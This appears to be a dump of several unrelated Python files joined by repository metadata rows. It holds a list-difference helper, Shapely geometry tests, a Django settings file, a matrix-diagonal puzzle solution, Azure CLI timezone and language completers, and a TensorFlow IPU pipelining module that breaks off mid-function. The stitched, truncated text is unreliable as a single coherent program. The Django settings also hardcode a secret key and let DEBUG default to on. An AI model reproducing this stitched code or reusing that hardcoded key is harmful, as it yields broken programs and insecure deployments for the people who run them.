Returns the symmetric difference of two lists (omitting repetitions). The
order of the elements of the output depends on their order in the lists.
    The order of the input lists does affect the result. Usage:
>>> alist = [1, 2, 3, 4, 5]
>>> blist = [7, 6, 5, 4, 3]
>>> llogic.symmetric_difference(alist, blist)
[1, 2, 7, 6]
>>> llogic.symmetric_difference(blist, alist)
[7, 6, 1, 2]
>>> alist = [1, 2, 3, 3, 4, 4, 5, 5, 5]
>>> blist = [3, 3, 4, 5, 5, 6]
>>> llogic.symmetric_difference(alist, blist)
[1, 2, 6]
Note that llogic.symmetric_difference does not flatten the lists so nested
lists are of type list:
>>> alist = [3, 4, 1, 5, 2]
>>> blist = [1, 2, 3, 4, 5]
>>> llogic.symmetric_difference(alist, blist)
[]
>>> alist = [3, 4, [1, [5, 2]]]
>>> blist = [1, 2, 3, 4, 5]
>>> llogic.symmetric_difference(alist, blist)
[[1, [5, 2]], 1, 2, 5]
The lists can contain any datatype:
>>> alist = [1, 2.3, 'foo', (3, 7)]
>>> blist = ['foo', 7+3j, (3, 7)]
>>> llogic.symmetric_difference(alist, blist)
[1, 2.3, 7+3j]
"""
if not isinstance(list_1, list):
raise TypeError('\'list_1\' must be \'list\'')
if not isinstance(list_2, list):
raise TypeError('\'list_2\' must be \'list\'')
output_list = []
for item in list_1 + list_2:
if item not in list_1 or item not in list_2:
if item not in output_list:
output_list.append(item)
return output_list
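# Illustrative cross-check (not part of the listools sources): for hashable,
# duplicate-free inputs the result should agree with Python's built-in set
# symmetric difference, order aside.
if __name__ == "__main__":
    alist = [1, 2, 3, 4, 5]
    blist = [7, 6, 5, 4, 3]
    assert set(symmetric_difference(alist, blist)) == set(alist) ^ set(blist)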
| 33.571429
| 78
| 0.577508
|
29b1de50936b64cd20a03704df67768e7561eea7
| 1,668
|
py
|
Python
|
tests/test_shared_paths.py
|
HirniMeshram/Shapely
|
5c57829f31c227111aa232fe61841e7969c19ca0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_shared_paths.py
|
HirniMeshram/Shapely
|
5c57829f31c227111aa232fe61841e7969c19ca0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_shared_paths.py
|
HirniMeshram/Shapely
|
5c57829f31c227111aa232fe61841e7969c19ca0
|
[
"BSD-3-Clause"
] | null | null | null |
from . import unittest
from shapely.geometry import Point, LineString, Polygon, MultiLineString, \
GeometryCollection
from shapely.geos import geos_version
from shapely.ops import shared_paths
@unittest.skipIf(geos_version < (3, 3, 0), 'GEOS 3.3.0 required')
class SharedPaths(unittest.TestCase):
def test_shared_paths_forward(self):
g1 = LineString([(0, 0), (10, 0), (10, 5), (20, 5)])
g2 = LineString([(5, 0), (15, 0)])
result = shared_paths(g1, g2)
self.assertTrue(isinstance(result, GeometryCollection))
self.assertTrue(len(result) == 2)
a, b = result.geoms
self.assertTrue(isinstance(a, MultiLineString))
self.assertTrue(len(a) == 1)
self.assertEqual(a.geoms[0].coords[:], [(5, 0), (10, 0)])
self.assertTrue(b.is_empty)
def test_shared_paths_forward2(self):
g1 = LineString([(0, 0), (10, 0), (10, 5), (20, 5)])
g2 = LineString([(15, 0), (5, 0)])
result = shared_paths(g1, g2)
self.assertTrue(isinstance(result, GeometryCollection))
self.assertTrue(len(result) == 2)
a, b = result.geoms
self.assertTrue(isinstance(b, MultiLineString))
self.assertTrue(len(b) == 1)
self.assertEqual(b.geoms[0].coords[:], [(5, 0), (10, 0)])
self.assertTrue(a.is_empty)
def test_wrong_type(self):
g1 = Point(0, 0)
g2 = LineString([(5, 0), (15, 0)])
with self.assertRaises(TypeError):
result = shared_paths(g1, g2)
with self.assertRaises(TypeError):
result = shared_paths(g2, g1)
| 37.066667
| 75
| 0.586331
|
94aa6de1a0aa1e1ed5049f88bc45e1d859171e0a
| 3,352
|
py
|
Python
|
profiles_project/settings.py
|
elam91/django-noob-api
|
3106daa5cb0e1cb634e507862b3bddbb04e0cbe1
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
elam91/django-noob-api
|
3106daa5cb0e1cb634e507862b3bddbb04e0cbe1
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
elam91/django-noob-api
|
3106daa5cb0e1cb634e507862b3bddbb04e0cbe1
|
[
"MIT"
] | null | null | null |
"""
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ble)pldsq=uu^9&e^_(f&ki0q$9!t&qh@^pbn(4=qidr(8vbr+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = bool(int(os.environ.get('DEBUG', 1)))
ALLOWED_HOSTS = ['ec2-63-33-204-115.eu-west-1.compute.amazonaws.com', '127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'profiles_api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'profiles_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'profiles_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'profiles_api.userprofile'
STATIC_ROOT = 'static/'
| 27.47541
| 91
| 0.699284
|
94a6e1e81a9d2817822faac305221950536452d7
| 740
|
py
|
Python
|
MatrixDiagonalSum.py
|
vanigupta20024/Programming-Challenges
|
578dba33e9f6b04052a503bcb5de9b32f33494a5
|
[
"MIT"
] | 14
|
2020-10-15T21:47:18.000Z
|
2021-12-01T06:06:51.000Z
|
MatrixDiagonalSum.py
|
vanigupta20024/Programming-Challenges
|
578dba33e9f6b04052a503bcb5de9b32f33494a5
|
[
"MIT"
] | null | null | null |
MatrixDiagonalSum.py
|
vanigupta20024/Programming-Challenges
|
578dba33e9f6b04052a503bcb5de9b32f33494a5
|
[
"MIT"
] | 4
|
2020-06-15T14:40:45.000Z
|
2021-06-15T06:22:03.000Z
|
'''
Given a square matrix mat, return the sum of the matrix diagonals.
Only include the sum of all the elements on the primary diagonal and all the elements on the secondary diagonal that are not part of the primary diagonal.
n == mat.length == mat[i].length
1 <= n <= 100
1 <= mat[i][j] <= 100
'''
from typing import List
class Solution:
def diagonalSum(self, mat: List[List[int]]) -> int:
i = j = k = 0
l = len(mat) - 1
mat_sum = 0
while i < len(mat):
mat_sum += mat[i][j] + mat[k][l]
if i == k and j == l:
mat_sum -= mat[i][j]
i += 1
j += 1
k += 1
l -= 1
return mat_sum
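# Illustrative check (not part of the original challenge file): for the 3x3
# matrix below the primary diagonal is 1+5+9 and the secondary is 3+7 (the
# centre 5 is counted only once), so the expected answer is 25.
if __name__ == "__main__":
    print(Solution().diagonalSum([[1, 2, 3], [4, 5, 6], [7, 8, 9]]))  # 25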
| 25.517241
| 154
| 0.475676
|
a01862d54b3fb79d0ad18b3daa9c3d00fe2bac8a
| 4,032
|
py
|
Python
|
src/support/azext_support/_completers.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/support/azext_support/_completers.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/support/azext_support/_completers.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=unused-argument
from azure.cli.core.decorators import Completer
languages = ["en-us", "es-es", "fr-fr", "de-de", "it-it", "ja-jp", "ko-kr", "ru-ru", "pt-br", "zh-tw", "zh-hans"]
timezones = ["Afghanistan Standard Time", "Alaskan Standard Time", "Arab Standard Time", "Arabian Standard Time",
"Arabic Standard Time", "Argentina Standard Time", "Atlantic Standard Time", "AUS Central Standard Time",
"AUS Eastern Standard Time", "Azerbaijan Standard Time", "Azores Standard Time",
"Canada Central Standard Time", "Cape Verde Standard Time", "Caucasus Standard Time",
"Cen. Australia Standard Time", "Central America Standard Time", "Central Asia Standard Time",
"Central Brazilian Standard Time", "Central Europe Standard Time", "Central European Standard Time",
"Central Pacific Standard Time", "Central Standard Time", "Central Standard Time (Mexico)",
"China Standard Time", "Dateline Standard Time", "E. Africa Standard Time",
"E. Australia Standard Time", "E. Europe Standard Time", "E. South America Standard Time",
"Eastern Standard Time", "Eastern Standard Time (Mexico)", "Egypt Standard Time",
"Ekaterinburg Standard Time", "Fiji Standard Time", "FLE Standard Time", "Georgian Standard Time",
"GMT Standard Time", "Greenland Standard Time", "Greenwich Standard Time", "GTB Standard Time",
"Hawaiian Standard Time", "India Standard Time", "Iran Standard Time", "Israel Standard Time",
"Jordan Standard Time", "Korea Standard Time", "Mauritius Standard Time",
"Central Standard Time (Mexico)", "Mid-Atlantic Standard Time", "Middle East Standard Time",
"Montevideo Standard Time", "Morocco Standard Time", "Mountain Standard Time",
"Mountain Standard Time (Mexico)", "Myanmar Standard Time", "N. Central Asia Standard Time",
"Namibia Standard Time", "Nepal Standard Time", "New Zealand Standard Time",
"Newfoundland Standard Time", "North Asia East Standard Time", "North Asia Standard Time",
"Pacific SA Standard Time", "Pacific Standard Time", "Pacific Standard Time (Mexico)",
"Pakistan Standard Time", "Romance Standard Time", "Russian Standard Time",
"SA Eastern Standard Time", "SA Pacific Standard Time", "SA Western Standard Time",
"Samoa Standard Time", "SE Asia Standard Time", "Singapore Standard Time",
"South Africa Standard Time", "Sri Lanka Standard Time", "Taipei Standard Time",
"Tasmania Standard Time", "Tokyo Standard Time", "Tonga Standard Time", "Turkey Standard Time",
"US Eastern Standard Time", "US Mountain Standard Time", "UTC", "Venezuela Standard Time",
"Vladivostok Standard Time", "W. Australia Standard Time", "W. Central Africa Standard Time",
"W. Europe Standard Time", "West Asia Standard Time", "West Pacific Standard Time",
"Yakutsk Standard Time"]
@Completer
def get_supported_languages_for_create(cmd, prefix, namespace, **kwargs):
return _get_supported_languages()
@Completer
def get_supported_languages_for_update(cmd, prefix, namespace, **kwargs):
return _get_supported_languages()
def _get_supported_languages():
return languages
@Completer
def get_supported_timezones_for_create(cmd, prefix, namespace, **kwargs):
return _get_supported_timezones()
@Completer
def get_supported_timezones_for_update(cmd, prefix, namespace, **kwargs):
return _get_supported_timezones()
def _get_supported_timezones():
return timezones
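# Illustrative variant (hypothetical, not used by the extension): a completer
# with the same signature can also narrow the static list by the prefix the
# user has already typed.
@Completer
def get_supported_timezones_filtered(cmd, prefix, namespace, **kwargs):
    return [tz for tz in _get_supported_timezones()
            if tz.lower().startswith((prefix or "").lower())]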
| 59.294118
| 118
| 0.651538
|
26b3a2ce7c873906e0d643e437789a303bfa03dd
| 31,447
|
py
|
Python
|
tensorflow/python/ipu/ops/pipelining_ops.py
|
DebeshJha/tensorflow-1
|
2b5a225c49d25273532d11c424d37ce394d7579a
|
[
"Apache-2.0"
] | 2
|
2021-03-08T23:32:06.000Z
|
2022-01-13T03:43:49.000Z
|
tensorflow/python/ipu/ops/pipelining_ops.py
|
DebeshJha/tensorflow-1
|
2b5a225c49d25273532d11c424d37ce394d7579a
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/ipu/ops/pipelining_ops.py
|
DebeshJha/tensorflow-1
|
2b5a225c49d25273532d11c424d37ce394d7579a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Pipelining operators
~~~~~~~~~~~~~~~~~~~~
"""
# Function captures are based on /tensorflow/python/ops/cond_v2.py
from enum import IntEnum
from google.protobuf import json_format
from tensorflow.compiler.plugin.poplar.driver import pipeline_config_pb2
from tensorflow.compiler.plugin.poplar.ops import gen_functional_ops
from tensorflow.compiler.plugin.poplar.ops import gen_poputil_ops
from tensorflow.python.ipu import functional_ops
from tensorflow.python.ipu import ipu_infeed_queue
from tensorflow.python.ipu import ipu_outfeed_queue
from tensorflow.python.ipu import scopes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import func_graph as func_graph_module
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util_v2 as util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import optimizer
class PipelineSchedule(IntEnum):
"""
The PipelineSchedule describes how stages are interleaved on the IPUs
servicing the pipeline. The forward and backward passes of each stage
will execute on the same IPUs. So, in the core of the pipeline there is a
choice as to whether to run the forward stages together, or the backward
stages and the forward stages together.
Attributes:
Grouped: This groups the forward passes on multiple IPUs. This requires
more memory since activations need to be stored until the backward
stages run together. However, since forward passes tend to be smaller
than backward passes, Grouped tends to improve the speed of the
execution, as different IPUs don't spend so much time waiting for each
other.
Interleaved: This schedules the backward passes whenever the forward
passes have just generated some activations. Consequently fewer
activations are required to be stored between the forward and backward
pipeline stages, so less memory is required. However, since forward
and backward stages tend to be very different in terms of execution
cycles, the overall performance of the pipeline tends to be slower.
Sequential: This is a debug mode, where the pipeline is scheduled in
the same way as if it were a sharded model.
"""
Grouped = 0
Interleaved = 1
Sequential = 2
class OptimizerFunctionOutput:
"""
A helper class used for returning a structured output from an
optimizer_function in a pipeline.
"""
def __init__(self, opt, loss):
"""Creates an OptimizerFunctionOutput object.
Args:
opt: An instance of `optimizer.Optimizer` which is used to generate
the back-propagation and the weight update pipeline stages.
loss: The loss which is passed to the optimizer.
"""
self.opt = opt
self.loss = loss
@property
def opt(self):
return self._opt
@opt.setter
def opt(self, value):
if not isinstance(value, optimizer.Optimizer):
raise TypeError(
"OptimizerFunctionOutput.opt must be a TensorFlow Optimizer "
"object.")
self._opt = value
@property
def loss(self):
return self._loss
@loss.setter
def loss(self, value):
if not isinstance(value, ops.Tensor):
raise TypeError(
"OptimizerFunctionOutput.loss must be a TensorFlow Tensor object.")
self._loss = value
class PipelineStageOptions:
"""
A helper class which can be used to configure Poplar compilation options (such
as 'availableMemoryProportion') inside a pipeline forward, backward and weight
update stage. This will override the global options set by
`ipu.utils.set_convolution_options` and `ipu.utils.set_matmul_options`.
"""
def __init__(self, convolution_options=None, matmul_options=None):
"""Creates an PipelineStageOptions object.
Args:
convolution_options: If provided, a dictionary of Poplar option flags for
all the convolution operations in the stage.
matmul_options: If provided, a dictionary of Poplar option flags for
all the matmul operations in the stage.
"""
convolution_options = convolution_options if convolution_options else {}
if not isinstance(convolution_options, dict):
raise TypeError(
"PipelineStageOptions.convolution_options must be dictionary.")
matmul_options = matmul_options if matmul_options else {}
if not isinstance(matmul_options, dict):
raise TypeError(
"PipelineStageOptions.matmul_options must be dictionary.")
# Add the values from the dicts into the proto.
self._proto = pipeline_config_pb2.PipelineStagePoplarConfig()
for (option_name, value) in convolution_options.items():
opt = self._proto.convolution_options.add()
opt.option = option_name
opt.value = value
for (option_name, value) in matmul_options.items():
opt = self._proto.matmul_options.add()
opt.option = option_name
opt.value = value
def get_proto(self):
return self._proto
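# Hedged usage sketch (values are illustrative; 'availableMemoryProportion' is
# the example option named in the class docstring above):
#   stage_opts = PipelineStageOptions(
#       convolution_options={"availableMemoryProportion": "0.4"},
#       matmul_options={"availableMemoryProportion": "0.4"})
#   # then pass one PipelineStageOptions per computational stage, e.g.
#   # forward_propagation_stages_poplar_options=[stage_opts, stage_opts]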
def pipeline(computational_stages,
pipeline_depth,
repeat_count=1,
inputs=None,
infeed_queue=None,
outfeed_queue=None,
optimizer_function=None,
device_mapping=None,
pipeline_schedule=None,
forward_propagation_stages_poplar_options=None,
backward_propagation_stages_poplar_options=None,
weight_update_poplar_options=None,
offload_weight_update_variables=True,
continuous_weight_updates=False,
outfeed_loss=False,
name=None):
"""
Sets up a series of computational stages, where the outputs of one stage are
the inputs to the next one. These stages are then executed in parallel across
multiple IPUs. This approach can be used to split the model where layer(s)
are executed on different IPUs.
The first stage takes the `inputs` and the `infeed_queue` (if provided) as
its inputs. If the `infeed_queue` is provided, it is automatically dequeued
(similar to the ipu.loops API) therefore care needs to be taken to make sure
the signature of the first pipeline stage matches both the arguments from
`inputs` and the `infeed_queue`, otherwise an error is thrown.
All tensors which are used in the pipeline which are not TensorFlow
Variables need to be explicitly passed as inputs to the pipeline. If an
input does not change its value during the execution of the pipeline op
(for example hyperparameters such as learning rate), it needs to be passed
as part of `inputs`. Alternatively, if these values change during execution
(for example the model processes different batches of data) the input should
be passed through the `infeed_queue`
(see :class:`~tensorflow.python.ipu.ipu_infeed_queue.IPUInfeedQueue`).
When training a model, an optional `optimizer_function` function can be
provided. This function takes all the outputs from the last computational
stage as inputs, and returns an instance of `OptimizerFunctionOutput` that
is used to generate the backwards pass of the model using the TensorFlow
Optimizer API. This will internally create corresponding backpropagation
pipeline stages for each pipeline stage and colocate them such that the
activations and weights required for the gradient calculation and
application stay on the device in order to minimise the number of copies
between IPUs.
Note that the gradients, which are calculated by the `compute_gradients`
function, will be accumulated automatically during the execution of the
pipeline, unless `continuous_weight_updates` is enabled.
If the last computational stage has any outputs, then an `outfeed_queue`
(see :class:`~tensorflow.python.ipu.ipu_outfeed_queue.IPUOutfeedQueue`)
is required and all the outputs from the last computational stage are enqueued
to the `outfeed_queue`.
  Note that pipelining also supports recomputation; to enable it, use the
`tensorflow.ipu.utils.set_recomputation_options()` function when configuring
the device.
For example a simple inference network for the MNIST can be split across two
IPUs:
.. code-block:: python
from tensorflow import keras
# Create the dataset
#...
# Create the data queues from/to IPU.
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset, "infeed")
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue("outfeed")
  # Create a pipelined model which is split across two stages.
def stage1(image):
partial = keras.layers.Dense(256, activation=tf.nn.relu)(image)
partial = keras.layers.Dense(128, activation=tf.nn.relu)(partial)
return partial
def stage2(partial):
logits = keras.layers.Dense(10)(partial)
probabilities = tf.nn.softmax(logits)
classes = tf.argmax(input=logits, axis=1)
return probabilities, classes
def model():
with variable_scope.variable_scope("vs", use_resource=True):
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
pipeline_depth=250,
repeat_count=2,
inputs=[],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
device_mapping=[3,1],
name="Pipeline")
return pipeline_op
with ops.device("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model, inputs=[])
outfeed_op = outfeed_queue.dequeue()
with tf.Session() as sess:
result = sess.run(compiled_model)
probabilities, classes = sess.run(outfeed_op)
  In this setup, the model is split across two IPUs. By default the first two
layers would be executed on the first IPU and the third layer and the
probabilities and classes on the second IPU but here `device_mapping` is
used to override the default IPU allocation and instead the first two layers
will be executed on the fourth IPU and the third layer and the probabilities
  and classes on the second IPU.
This creates a pipeline of depth 250 (specified by the `pipeline_depth`),
which means each pipeline stage is executed 250 times.
  This pipeline is then executed 2 times (specified by the `repeat_count`).
The results of the pipeline (probabilities and classes) are returned to the
host by the outfeed queue.
We can also train this network by providing `optimizer_function`:
.. code-block:: python
from tensorflow import keras
# Create the dataset
#...
# Create the data queues from/to IPU.
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset, "infeed")
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue("outfeed")
  # Create a pipelined model which is split across two stages.
def stage1(lr, images, labels):
partial = keras.layers.Dense(256, activation=tf.nn.relu)(images)
partial = keras.layers.Dense(128, activation=tf.nn.relu)(partial)
return lr, partial, labels
def stage2(lr, partial, labels):
logits = keras.layers.Dense(10)(partial)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
loss = tf.reduce_mean(cross_entropy)
return lr, loss
def optimizer_function(lr, loss):
optimizer = tf.train.GradientDescentOptimizer(lr)
return pipelining_ops.OptimizerFunctionOutput(optimizer, loss)
def model(lr):
with variable_scope.variable_scope("vs", use_resource=True):
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
pipeline_depth=128,
repeat_count=10,
inputs=[lr],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
optimizer_function=optimizer_function,
name="Pipeline")
return pipeline_op
with ops.device('cpu'):
lr = tf.placeholder(np.float16, [])
with ops.device("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model, inputs=[lr])
outfeed_op = outfeed_queue.dequeue()
with tf.Session() as sess:
result = sess.run(compiled_model, {lr: 0.01})
losses = sess.run(outfeed_op)
Here the `tf.train.GradientDescentOptimizer` generates the pipeline stages
which calculate the gradients and apply them to the weights. Note how the
loss is returned to the host by the outfeed queue.
If a model requires multiple computational pipeline stages to access the same
`tf.Variable`, then all of these computational stages need to be placed on the
same IPU using the `device_mapping` argument.
Note that modifying `tf.Variable` values in a pipeline stage and/or during the
gradient calculation will result in undefined behavior. These variables can
only be modified by the `apply_gradients` member function of the applied
Optimizer.
Args:
computational_stages: a list of python functions, where each function
represents a computational pipeline stage. The function takes the
outputs of the previous pipeline state as its inputs.
pipeline_depth: the number of times each pipeline stage will be executed.
repeat_count: the number of times the pipeline will be executed.
inputs: arguments passed to the first pipeline stage.
infeed_queue: optional IPUInfeedQueue, if passed, it is dequeued and
passed as an input in the first pipeline stage.
outfeed_queue: IPUOutfeedQueue, required if the last computational stage
has any outputs. The outputs of these are enqueued to this queue and
they can be accessed on the host.
optimizer_function: optional Python function which takes the output of the
last computational stage as parameters and returns an instance of
`pipelining_ops.OptimizerFunctionOutput` in order to generate the
back-propagation and weight-update parts of the model suitable for
training.
device_mapping: If provided, a list of length equal to the number of
computational stages. An element at index `i` in the list represents which
IPU the computational stage `computational_stages[i]` should reside on.
This can be used to make sure computational stages which share
`tf.Variable`s are resident on the same IPU.
pipeline_schedule: Which scheduling algorithm to use for pipeline
lowering. Defaults to `PipelineSchedule.Grouped`.
forward_propagation_stages_poplar_options: If provided, a list of length
equal to the number of computational stages. Each element is a
PipelineStageOptions object which allows for fine grain control of the
Poplar options for a given forward propagation computational stage.
backward_propagation_stages_poplar_options: If provided, a list of length
equal to the number of computational stages. Each element is a
PipelineStageOptions object which allows for fine grained control of the
Poplar options for a given backward propagation computational stage.
weight_update_poplar_options: If provided, a PipelineStageOptions object
which allows for fine grained control of the Poplar options for the
weight update stage.
offload_weight_update_variables: If True, any `tf.Variable` which is
only used by the weight update of the pipeline (for example the
accumulator variable when using the `tf.MomentumOptimizer`), will be
stored in the remote memory. During the weight update this variable will
be streamed onto the device and then streamed back to the remote memory
after it has been updated. Requires the machine to be configured with
support for `Poplar remote buffers`. Offloading variables into remote
memory can reduce maximum memory liveness, but can also increase the
computation time of the weight update. Note that this option has no effect
for inference only pipelines.
continuous_weight_updates: ** CURRENTLY UNIMPLEMENTED ** When training,
this option will apply the gradients to the resource variables
immediately, rather than accumulating the gradients and applying them
at the end of each execution of the pipeline.
outfeed_loss: If True, the loss given by the `optimizer_function` will
be enqueued on the outfeed, instead of the outputs from the last
computational stage.
name: name of this pipeline.
Returns:
An `Operation` that executes the pipeline.
"""
name = name if name else "pipeline"
# Ensure inputs is a list, without casting inputs to a boolean. Casting
# a tf.Tensor to a boolean will be interpreted as an operation in the
# graph by Autograph.
inputs = inputs if not isinstance(inputs, type(None)) else []
inputs = functional_ops._convert_to_list(inputs) # pylint: disable=protected-access
inputs = ops.convert_n_to_tensor(inputs)
if continuous_weight_updates:
raise NotImplementedError(
"Continuous weight updates are currently not supported.")
for i, input in enumerate(inputs):
if input.dtype == dtypes.resource:
logging.warn("Passing tensor {} by value.".format(str(input)))
inputs[i] = input.value()
device_mapping = device_mapping if device_mapping else list(
range(0, len(computational_stages)))
if not isinstance(computational_stages, (list, tuple)):
raise TypeError(
"computational_stages argument needs to be a list or a tuple.")
if infeed_queue:
if not isinstance(infeed_queue, ipu_infeed_queue.IPUInfeedQueue):
raise TypeError("infeed_queue is not an instance of "
"ipu_infeed_queue.IPUOutfeedQueue")
if outfeed_queue:
if not isinstance(outfeed_queue, ipu_outfeed_queue.IPUOutfeedQueue):
raise TypeError("outfeed_queue is not an instance of "
"ipu_outfeed_queue.IPUOutfeedQueue")
# We expect at least one stage.
if len(computational_stages) < 2:
raise ValueError("Pipeline requires at least two computational stages.")
if not isinstance(device_mapping, (list, tuple)):
raise TypeError("device_mapping argument needs to be a list or a tuple.")
if len(device_mapping) != len(computational_stages):
raise ValueError(
"Each stage must be mapped to an IPU: %d mappings != %d stages" %
(len(device_mapping), len(computational_stages)))
if pipeline_schedule is None:
pipeline_schedule = PipelineSchedule.Grouped
if not isinstance(pipeline_schedule, PipelineSchedule):
raise TypeError("The given pipeline_schedule is not a member of the "
"PipelineSchedule enumeration.")
# TODO(T18660) interleaved schedule does not support multiple stages on the
# same IPU during training.
if pipeline_schedule == PipelineSchedule.Interleaved and len(
device_mapping) != len(set(device_mapping)) and optimizer_function:
raise NotImplementedError(
"The pipelining schedule 'Interleaved' does not currently support "
"multiple pipeline stages on the same device for training graphs. "
"Please use a different pipeline schedule.")
# Function for setting up and validating the per stage Poplar options.
def validate_stage_options_and_populate_proto(stages_poplar_options,
proto_list, name):
if stages_poplar_options is None:
stages_poplar_options = [
PipelineStageOptions() for i in range(len(computational_stages))
]
if not isinstance(stages_poplar_options, (list, tuple)):
raise TypeError(
"%s must be a list or a tuple of PipelineStageOptions objects." %
(name))
if len(stages_poplar_options) != len(computational_stages):
raise ValueError(
"%s must be a list or a tuple of PipelineStageOptions objects of "
"length %d (same number as the number of computational stages) but "
"is %d." %
(name, len(computational_stages), len(stages_poplar_options)))
for stage_options in stages_poplar_options:
if not isinstance(stage_options, PipelineStageOptions):
raise TypeError(
"Expected all elements of %s to be of type PipelineStageOptions, "
"but got %s instead." % (name, str(stage_options)))
for stage_options in stages_poplar_options:
proto_list.append(stage_options.get_proto())
pipeline_poplar_config = pipeline_config_pb2.PipelinePoplarConfig()
validate_stage_options_and_populate_proto(
forward_propagation_stages_poplar_options,
pipeline_poplar_config.forward_stages,
"forward_propagation_stages_poplar_options")
if optimizer_function:
validate_stage_options_and_populate_proto(
backward_propagation_stages_poplar_options,
pipeline_poplar_config.backward_stages,
"backward_propagation_stages_poplar_options")
if weight_update_poplar_options is None:
weight_update_poplar_options = PipelineStageOptions()
if not isinstance(weight_update_poplar_options, PipelineStageOptions):
raise TypeError(
"weight_update_poplar_options to be of type PipelineStageOptions, "
"but got %s instead." % (str(weight_update_poplar_options)))
pipeline_poplar_config.resource_update.CopyFrom(
weight_update_poplar_options.get_proto())
if outfeed_loss and not optimizer_function:
raise ValueError(
"An optimizer_function must be provided when outfeed_loss is True")
control_outputs = []
def _pipeline(*args):
outputs = args
for stage_id, stage in enumerate(computational_stages):
stage_infeed_queue = infeed_queue if stage_id == 0 else None
if stage_id == len(computational_stages) - 1 and not optimizer_function:
stage_outfeed_queue = outfeed_queue
else:
stage_outfeed_queue = None
stage_name = name + "_stage_" + str(stage_id)
outputs = _pipeline_stage(stage,
stage_id,
device_mapping[stage_id],
outputs,
infeed_queue=stage_infeed_queue,
outfeed_queue=stage_outfeed_queue,
name=stage_name)
if optimizer_function:
outputs = functional_ops._convert_to_list(outputs) # pylint: disable=protected-access
# Get the output from the optimizer function
opt_fn = optimizer_function(*outputs)
loss = opt_fn.loss
